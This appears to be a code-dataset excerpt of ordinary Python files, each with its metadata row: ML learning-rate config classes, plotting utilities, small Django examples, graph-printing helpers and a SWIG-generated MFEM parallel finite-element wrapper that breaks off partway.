intervals. Defaults to False.
"""
name: str = 'ExponentialDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
decay_rate: Optional[float] = None
staircase: Optional[bool] = None
@dataclasses.dataclass
class PolynomialLrConfig(base_config.Config):
"""Configuration for polynomial learning rate decay.
This class is a containers for the polynomial learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to PolynomialDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
end_learning_rate: A float. The minimal end learning rate.
power: A float. The power of the polynomial. Defaults to linear, 1.0.
cycle: A boolean, whether or not it should cycle beyond decay_steps.
Defaults to False.
"""
name: str = 'PolynomialDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
end_learning_rate: float = 0.0001
power: float = 1.0
cycle: bool = False
@dataclasses.dataclass
class CosineLrConfig(base_config.Config):
"""Configuration for Cosine learning rate decay.
This class is a containers for the cosine learning rate decay configs,
tf.keras.experimental.CosineDecay.
Attributes:
name: The name of the learning rate schedule. Defaults to CosineDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
alpha: A float. Minimum learning rate value as a fraction of
initial_learning_rate.
"""
name: str = 'CosineDecay'
initial_learning_rate: Optional[float] = None
decay_steps: Optional[int] = None
alpha: float = 0.0
@dataclasses.dataclass
class LinearWarmupConfig(base_config.Config):
"""Configuration for linear warmup schedule config.
This class is a container for the linear warmup schedule configs.
Warmup_learning_rate is the initial learning rate, the final learning rate of
the warmup period is the learning_rate of the optimizer in use. The learning
rate at each step linearly increased according to the following formula:
warmup_learning_rate = warmup_learning_rate +
step / warmup_steps * (final_learning_rate - warmup_learning_rate).
Using warmup overrides the learning rate schedule by the number of warmup
steps.
Attributes:
name: The name of warmup schedule. Defaults to linear.
warmup_learning_rate: Initial learning rate for the warmup. Defaults to 0.
warmup_steps: Warmup steps. Defaults to None.
"""
name: str = 'linear'
warmup_learning_rate: float = 0
warmup_steps: Optional[int] = None
@dataclasses.dataclass
class PolynomialWarmupConfig(base_config.Config):
"""Configuration for linear warmup schedule config.
This class is a container for the polynomial warmup schedule configs.
Attributes:
name: The name of warmup schedule. Defaults to Polynomial.
power: Polynomial power. Defaults to 1.
warmup_steps: Warmup steps. Defaults to None.
"""
name: str = 'polynomial'
power: float = 1
warmup_steps: Optional[int] = None
| 37.811765 | 80 | 0.733043 | 871 | 6,428 | 5.344432 | 0.223881 | 0.128894 | 0.04898 | 0.043609 | 0.401289 | 0.319871 | 0.318367 | 0.3029 | 0.3029 | 0.264232 | 0 | 0.013591 | 0.187306 | 6,428 | 169 | 81 | 38.035503 | 0.877489 | 0.733354 | 0 | 0.348837 | 0 | 0 | 0.058433 | 0.014608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.069767 | 0 | 0.837209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
138f85c266c67ac474d6478497e3e4d6cc00eb90 | 2,159 | py | Python | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | ImitationLearning/Plot.py | gautam-sharma1/Imitation-Learning | 20b6fcd2a8d6de8eb95e6831f5b379a083306361 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
class Plot:
def __init__(self, input_list, output_list):
self.df1 = pd.DataFrame(input_list) # x1, y1, x2, y2, x3, y3 .. ...
self.df2 = pd.DataFrame(output_list) # theta1, theta 2 ....
self.X_train = self.df1.iloc[:,:].values
self.y_train = self.df2.iloc[:,:].values
def plot_2link_data(self):
"""
Plots first 100 input data points
:return:
"""
plt.scatter(self.X_train[:100,0], self.X_train[:100,1])
plt.scatter(self.X_train[:100,2], self.X_train[:100,3])
def plot_2link_labels(self):
"""
Plots first 100 target values
:return:
"""
plt.scatter(range(100),self.y_train[:100,0])
plt.scatter(range(100),self.y_train[:100,1])
def plot_3link_data(self):
"""
Plots first 100 input data points
:return:
"""
plt.scatter(self.X_train[:100,0], self.X_train[:100,1])
plt.scatter(self.X_train[:100,2], self.X_train[:100,3])
plt.scatter(self.X_train[:100,4], self.X_train[:100,5])
def plot_3link_labels(self):
"""
Plots first 100 target values
:return:
"""
plt.scatter(range(100),self.y_train[:100,0])
plt.scatter(range(100),self.y_train[:100,1])
plt.scatter(range(100),self.y_train[:100,2])
@staticmethod
def plot_3link_validation(y, prediction, epoch = 0):
fig = plt.figure()
plt.scatter(y[:,0],prediction.to('cpu')[:,0])
plt.scatter(y[:,1],prediction.to('cpu')[:,1])
plt.scatter(y[:,2],prediction.to('cpu')[:,2])
fig.savefig("theta1_iter"+str(epoch), dpi=300)
plt.xlabel("Ground truth")
plt.ylabel("Prediction")
plt.show()
@staticmethod
def plot_2link_validation(y, prediction, epoch=0):
fig = plt.figure()
plt.scatter(y[:,0],prediction.to('cpu')[:,0])
plt.scatter(y[:,1],prediction.to('cpu')[:,1])
fig.savefig("theta1_iter"+str(epoch), dpi=300)
plt.xlabel("Ground truth")
plt.ylabel("Prediction")
plt.show() | 32.223881 | 76 | 0.576193 | 302 | 2,159 | 3.990066 | 0.221854 | 0.124481 | 0.091286 | 0.107884 | 0.705394 | 0.705394 | 0.686307 | 0.686307 | 0.660581 | 0.660581 | 0 | 0.07716 | 0.249653 | 2,159 | 67 | 77 | 32.223881 | 0.666667 | 0.099583 | 0 | 0.585366 | 0 | 0 | 0.04453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.04878 | 0 | 0.243902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
13a807cee2abc98353fd52bdfd984de3bbc6a986 | 370 | py | Python | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 116 | 2016-12-07T00:50:04.000Z | 2022-03-31T06:34:02.000Z | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 5 | 2018-09-29T20:48:05.000Z | 2021-06-10T18:21:51.000Z | Chapter 3/restful_python_chapter_03_04/users_test_01.py | Mohamed2011-bit/Building-RESTful-Python-Web-Services | 503c9b5fec57eeb58397514f3168c3c5248724a3 | [
"MIT"
] | 79 | 2017-01-02T05:16:01.000Z | 2022-02-16T04:23:52.000Z | """
Book: Building RESTful Python Web Services
Chapter 3: Improving and adding authentication to an API with Django
Author: Gaston C. Hillar - Twitter.com/gastonhillar
Publisher: Packt Publishing Ltd. - http://www.packtpub.com
"""
from django.contrib.auth.models import User
user = User.objects.create_user('kevin', 'kevin@example.com', 'kevinpassword')
user.save()
| 33.636364 | 79 | 0.764865 | 51 | 370 | 5.529412 | 0.843137 | 0.056738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003077 | 0.121622 | 370 | 10 | 80 | 37 | 0.864615 | 0.6 | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
13bd8a022bd7067f818f2edfa3c4f6afeb89ef69 | 325 | py | Python | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | 1 | 2021-02-11T13:26:06.000Z | 2021-02-11T13:26:06.000Z | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | null | null | null | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | null | null | null | from django.db.models import SET_NULL, ForeignKey, Model
from django.db.models.fields import CharField
class Flavor(Model):
name = CharField(max_length=255)
label = CharField(max_length=255)
parent = ForeignKey("self", blank=True, null=True, on_delete=SET_NULL)
def __str__(self):
return self.name
| 27.083333 | 74 | 0.729231 | 46 | 325 | 4.956522 | 0.586957 | 0.087719 | 0.105263 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.169231 | 325 | 11 | 75 | 29.545455 | 0.822222 | 0 | 0 | 0 | 0 | 0 | 0.012308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
13ceb9b96c3aa64340e4d65b361bc0b0d1c7930f | 764 | py | Python | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from anytree import RenderTree
from networkx import nx
import os
import pygraphviz
import time
def timeit(method):
def timed(*args, **kw):
print(f"Running {method.__name__}...")
ts = time.time()
result = method(*args, **kw)
te = time.time()
print(f"{method.__name__} took {(te - ts) * 1000:.2f}ms\n")
return result
return timed
def print_ast(ast):
print(RenderTree(ast))
def print_cfg(cfg):
print(nx.drawing.nx_pydot.to_pydot(cfg))
def write_cfg(cfg, filename, layout="dot"):
path = "output/" + os.path.splitext(filename)[0] + f".{layout}.png"
graph = nx.drawing.nx_agraph.to_agraph(cfg)
graph.layout(layout)
graph.draw(path)
| 20.648649 | 71 | 0.63089 | 108 | 764 | 4.324074 | 0.481481 | 0.025696 | 0.047109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013289 | 0.212042 | 764 | 36 | 72 | 21.222222 | 0.762458 | 0.056283 | 0 | 0 | 0 | 0 | 0.139082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.217391 | 0 | 0.521739 | 0.26087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
13cf07bf14db42514ba47a2ecdb3238828dcb0cb | 23,279 | py | Python | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.2
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _pfespace
else:
import _pfespace
try:
import builtins as __builtin__
except ImportError:
import __builtin__
_swig_new_instance_method = _pfespace.SWIG_PyInstanceMethod_New
_swig_new_static_method = _pfespace.SWIG_PyStaticMethod_New
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
def set_instance_attr(self, name, value):
if name == "thisown":
self.this.own(value)
elif name == "this":
set(self, name, value)
elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
set(self, name, value)
else:
raise AttributeError("You cannot add instance attributes to %s" % self)
return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
def set_class_attr(cls, name, value):
if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
set(cls, name, value)
else:
raise AttributeError("You cannot add class attributes to %s" % cls)
return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
"""Meta class to enforce nondynamic attributes (no new attributes) for a class"""
__setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
import weakref
MFEM_VERSION = _pfespace.MFEM_VERSION
MFEM_VERSION_STRING = _pfespace.MFEM_VERSION_STRING
MFEM_VERSION_TYPE = _pfespace.MFEM_VERSION_TYPE
MFEM_VERSION_TYPE_RELEASE = _pfespace.MFEM_VERSION_TYPE_RELEASE
MFEM_VERSION_TYPE_DEVELOPMENT = _pfespace.MFEM_VERSION_TYPE_DEVELOPMENT
MFEM_VERSION_MAJOR = _pfespace.MFEM_VERSION_MAJOR
MFEM_VERSION_MINOR = _pfespace.MFEM_VERSION_MINOR
MFEM_VERSION_PATCH = _pfespace.MFEM_VERSION_PATCH
MFEM_HYPRE_VERSION = _pfespace.MFEM_HYPRE_VERSION
import mfem._par.operators
import mfem._par.mem_manager
import mfem._par.vector
import mfem._par.array
import mfem._par.fespace
import mfem._par.coefficient
import mfem._par.globals
import mfem._par.matrix
import mfem._par.intrules
import mfem._par.sparsemat
import mfem._par.densemat
import mfem._par.eltrans
import mfem._par.fe
import mfem._par.geom
import mfem._par.mesh
import mfem._par.sort_pairs
import mfem._par.ncmesh
import mfem._par.vtk
import mfem._par.element
import mfem._par.table
import mfem._par.hash
import mfem._par.vertex
import mfem._par.gridfunc
import mfem._par.bilininteg
import mfem._par.fe_coll
import mfem._par.lininteg
import mfem._par.linearform
import mfem._par.handle
import mfem._par.hypre
import mfem._par.restriction
import mfem._par.pmesh
import mfem._par.pncmesh
import mfem._par.communication
import mfem._par.sets
class ParFiniteElementSpace(mfem._par.fespace.FiniteElementSpace):
r"""Proxy of C++ mfem::ParFiniteElementSpace class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
num_face_nbr_dofs = property(_pfespace.ParFiniteElementSpace_num_face_nbr_dofs_get, _pfespace.ParFiniteElementSpace_num_face_nbr_dofs_set, doc=r"""num_face_nbr_dofs : int""")
face_nbr_element_dof = property(_pfespace.ParFiniteElementSpace_face_nbr_element_dof_get, _pfespace.ParFiniteElementSpace_face_nbr_element_dof_set, doc=r"""face_nbr_element_dof : mfem::Table""")
face_nbr_ldof = property(_pfespace.ParFiniteElementSpace_face_nbr_ldof_get, _pfespace.ParFiniteElementSpace_face_nbr_ldof_set, doc=r"""face_nbr_ldof : mfem::Table""")
face_nbr_glob_dof_map = property(_pfespace.ParFiniteElementSpace_face_nbr_glob_dof_map_get, doc=r"""face_nbr_glob_dof_map : mfem::Array<(HYPRE_Int)>""")
send_face_nbr_ldof = property(_pfespace.ParFiniteElementSpace_send_face_nbr_ldof_get, _pfespace.ParFiniteElementSpace_send_face_nbr_ldof_set, doc=r"""send_face_nbr_ldof : mfem::Table""")
def __init__(self, *args):
r"""
__init__(ParFiniteElementSpace self, ParFiniteElementSpace orig, ParMesh pmesh=None, FiniteElementCollection fec=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, FiniteElementSpace orig, ParMesh pmesh, FiniteElementCollection fec=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, FiniteElementSpace global_fes, int const * partitioning, FiniteElementCollection f=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, FiniteElementCollection f, int dim=1, int ordering=byNODES) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, mfem::NURBSExtension * ext, FiniteElementCollection f, int dim=1, int ordering=byNODES) -> ParFiniteElementSpace
"""
_pfespace.ParFiniteElementSpace_swiginit(self, _pfespace.new_ParFiniteElementSpace(*args))
def GetComm(self):
r"""GetComm(ParFiniteElementSpace self) -> MPI_Comm"""
return _pfespace.ParFiniteElementSpace_GetComm(self)
GetComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetComm)
def GetNRanks(self):
r"""GetNRanks(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetNRanks(self)
GetNRanks = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetNRanks)
def GetMyRank(self):
r"""GetMyRank(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetMyRank(self)
GetMyRank = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyRank)
def GetParMesh(self):
r"""GetParMesh(ParFiniteElementSpace self) -> ParMesh"""
return _pfespace.ParFiniteElementSpace_GetParMesh(self)
GetParMesh = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetParMesh)
def GetDofSign(self, i):
r"""GetDofSign(ParFiniteElementSpace self, int i) -> int"""
return _pfespace.ParFiniteElementSpace_GetDofSign(self, i)
GetDofSign = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetDofSign)
def GetDofOffsets(self):
r"""GetDofOffsets(ParFiniteElementSpace self) -> HYPRE_Int *"""
return _pfespace.ParFiniteElementSpace_GetDofOffsets(self)
GetDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetDofOffsets)
def GetTrueDofOffsets(self):
r"""GetTrueDofOffsets(ParFiniteElementSpace self) -> HYPRE_Int *"""
return _pfespace.ParFiniteElementSpace_GetTrueDofOffsets(self)
GetTrueDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueDofOffsets)
def GlobalVSize(self):
r"""GlobalVSize(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GlobalVSize(self)
GlobalVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GlobalVSize)
def GlobalTrueVSize(self):
r"""GlobalTrueVSize(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GlobalTrueVSize(self)
GlobalTrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GlobalTrueVSize)
def GetTrueVSize(self):
r"""GetTrueVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetTrueVSize(self)
GetTrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueVSize)
def GetElementDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetElementDofs(self, i, vdofs)
return vdofs.ToList()
def GetBdrElementDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetBdrElementDofs(self, i, vdofs)
return vdofs.ToList()
def GetFaceDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetFaceDofs(self, i, vdofs)
return vdofs.ToList()
def GetFaceRestriction(self, *args, **kwargs):
r"""GetFaceRestriction(ParFiniteElementSpace self, mfem::ElementDofOrdering e_ordering, mfem::FaceType type, mfem::L2FaceValues mul=DoubleValued) -> Operator"""
return _pfespace.ParFiniteElementSpace_GetFaceRestriction(self, *args, **kwargs)
GetFaceRestriction = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceRestriction)
def GetSharedEdgeDofs(self, group, ei):
from .array import intArray
dofs = intArray()
_pfespace.ParFiniteElementSpace_GetSharedEdgeDofs(self, group, ei, dofs)
return dofs.ToList()
def GetSharedTriangleDofs(self, group, fi, dofs):
r"""GetSharedTriangleDofs(ParFiniteElementSpace self, int group, int fi, intArray dofs)"""
return _pfespace.ParFiniteElementSpace_GetSharedTriangleDofs(self, group, fi, dofs)
GetSharedTriangleDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetSharedTriangleDofs)
def GetSharedQuadrilateralDofs(self, group, fi, dofs):
r"""GetSharedQuadrilateralDofs(ParFiniteElementSpace self, int group, int fi, intArray dofs)"""
return _pfespace.ParFiniteElementSpace_GetSharedQuadrilateralDofs(self, group, fi, dofs)
GetSharedQuadrilateralDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetSharedQuadrilateralDofs)
def Dof_TrueDof_Matrix(self):
r"""Dof_TrueDof_Matrix(ParFiniteElementSpace self) -> HypreParMatrix"""
return _pfespace.ParFiniteElementSpace_Dof_TrueDof_Matrix(self)
Dof_TrueDof_Matrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Dof_TrueDof_Matrix)
def GetPartialConformingInterpolation(self):
r"""GetPartialConformingInterpolation(ParFiniteElementSpace self) -> HypreParMatrix"""
return _pfespace.ParFiniteElementSpace_GetPartialConformingInterpolation(self)
GetPartialConformingInterpolation = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetPartialConformingInterpolation)
def NewTrueDofVector(self):
r"""NewTrueDofVector(ParFiniteElementSpace self) -> HypreParVector"""
return _pfespace.ParFiniteElementSpace_NewTrueDofVector(self)
NewTrueDofVector = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_NewTrueDofVector)
def DivideByGroupSize(self, vec):
r"""DivideByGroupSize(ParFiniteElementSpace self, double * vec)"""
return _pfespace.ParFiniteElementSpace_DivideByGroupSize(self, vec)
DivideByGroupSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_DivideByGroupSize)
def GroupComm(self, *args):
r"""
GroupComm(ParFiniteElementSpace self) -> GroupCommunicator
GroupComm(ParFiniteElementSpace self) -> GroupCommunicator
"""
return _pfespace.ParFiniteElementSpace_GroupComm(self, *args)
GroupComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GroupComm)
def ScalarGroupComm(self):
r"""ScalarGroupComm(ParFiniteElementSpace self) -> GroupCommunicator"""
return _pfespace.ParFiniteElementSpace_ScalarGroupComm(self)
ScalarGroupComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_ScalarGroupComm)
def Synchronize(self, ldof_marker):
r"""Synchronize(ParFiniteElementSpace self, intArray ldof_marker)"""
return _pfespace.ParFiniteElementSpace_Synchronize(self, ldof_marker)
Synchronize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Synchronize)
def GetEssentialVDofs(self, bdr_attr_is_ess, ess_dofs, component=-1):
r"""GetEssentialVDofs(ParFiniteElementSpace self, intArray bdr_attr_is_ess, intArray ess_dofs, int component=-1)"""
return _pfespace.ParFiniteElementSpace_GetEssentialVDofs(self, bdr_attr_is_ess, ess_dofs, component)
GetEssentialVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetEssentialVDofs)
def GetEssentialTrueDofs(self, bdr_attr_is_ess, ess_tdof_list, component=-1):
r"""GetEssentialTrueDofs(ParFiniteElementSpace self, intArray bdr_attr_is_ess, intArray ess_tdof_list, int component=-1)"""
return _pfespace.ParFiniteElementSpace_GetEssentialTrueDofs(self, bdr_attr_is_ess, ess_tdof_list, component)
GetEssentialTrueDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetEssentialTrueDofs)
def GetLocalTDofNumber(self, ldof):
r"""GetLocalTDofNumber(ParFiniteElementSpace self, int ldof) -> int"""
return _pfespace.ParFiniteElementSpace_GetLocalTDofNumber(self, ldof)
GetLocalTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetLocalTDofNumber)
def GetGlobalTDofNumber(self, ldof):
r"""GetGlobalTDofNumber(ParFiniteElementSpace self, int ldof) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetGlobalTDofNumber(self, ldof)
GetGlobalTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetGlobalTDofNumber)
def GetGlobalScalarTDofNumber(self, sldof):
r"""GetGlobalScalarTDofNumber(ParFiniteElementSpace self, int sldof) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetGlobalScalarTDofNumber(self, sldof)
GetGlobalScalarTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetGlobalScalarTDofNumber)
def GetMyDofOffset(self):
r"""GetMyDofOffset(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetMyDofOffset(self)
GetMyDofOffset = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyDofOffset)
def GetMyTDofOffset(self):
r"""GetMyTDofOffset(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetMyTDofOffset(self)
GetMyTDofOffset = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyTDofOffset)
def GetProlongationMatrix(self):
r"""GetProlongationMatrix(ParFiniteElementSpace self) -> Operator"""
return _pfespace.ParFiniteElementSpace_GetProlongationMatrix(self)
GetProlongationMatrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetProlongationMatrix)
def GetRestrictionMatrix(self):
r"""GetRestrictionMatrix(ParFiniteElementSpace self) -> SparseMatrix"""
return _pfespace.ParFiniteElementSpace_GetRestrictionMatrix(self)
GetRestrictionMatrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetRestrictionMatrix)
def ExchangeFaceNbrData(self):
r"""ExchangeFaceNbrData(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_ExchangeFaceNbrData(self)
ExchangeFaceNbrData = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_ExchangeFaceNbrData)
def GetFaceNbrVSize(self):
r"""GetFaceNbrVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrVSize(self)
GetFaceNbrVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrVSize)
def GetFaceNbrElementVDofs(self, i, vdofs):
r"""GetFaceNbrElementVDofs(ParFiniteElementSpace self, int i, intArray vdofs)"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrElementVDofs(self, i, vdofs)
GetFaceNbrElementVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrElementVDofs)
def GetFaceNbrFaceVDofs(self, i, vdofs):
r"""GetFaceNbrFaceVDofs(ParFiniteElementSpace self, int i, intArray vdofs)"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFaceVDofs(self, i, vdofs)
GetFaceNbrFaceVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFaceVDofs)
def GetFaceNbrFE(self, i):
r"""GetFaceNbrFE(ParFiniteElementSpace self, int i) -> FiniteElement"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFE(self, i)
GetFaceNbrFE = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFE)
def GetFaceNbrFaceFE(self, i):
r"""GetFaceNbrFaceFE(ParFiniteElementSpace self, int i) -> FiniteElement"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFaceFE(self, i)
GetFaceNbrFaceFE = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFaceFE)
def GetFaceNbrGlobalDofMap(self):
r"""GetFaceNbrGlobalDofMap(ParFiniteElementSpace self) -> HYPRE_Int const *"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrGlobalDofMap(self)
GetFaceNbrGlobalDofMap = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrGlobalDofMap)
def GetFaceNbrElementTransformation(self, i):
r"""GetFaceNbrElementTransformation(ParFiniteElementSpace self, int i) -> ElementTransformation"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrElementTransformation(self, i)
GetFaceNbrElementTransformation = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrElementTransformation)
def Lose_Dof_TrueDof_Matrix(self):
r"""Lose_Dof_TrueDof_Matrix(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_Lose_Dof_TrueDof_Matrix(self)
Lose_Dof_TrueDof_Matrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Lose_Dof_TrueDof_Matrix)
def LoseDofOffsets(self):
r"""LoseDofOffsets(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_LoseDofOffsets(self)
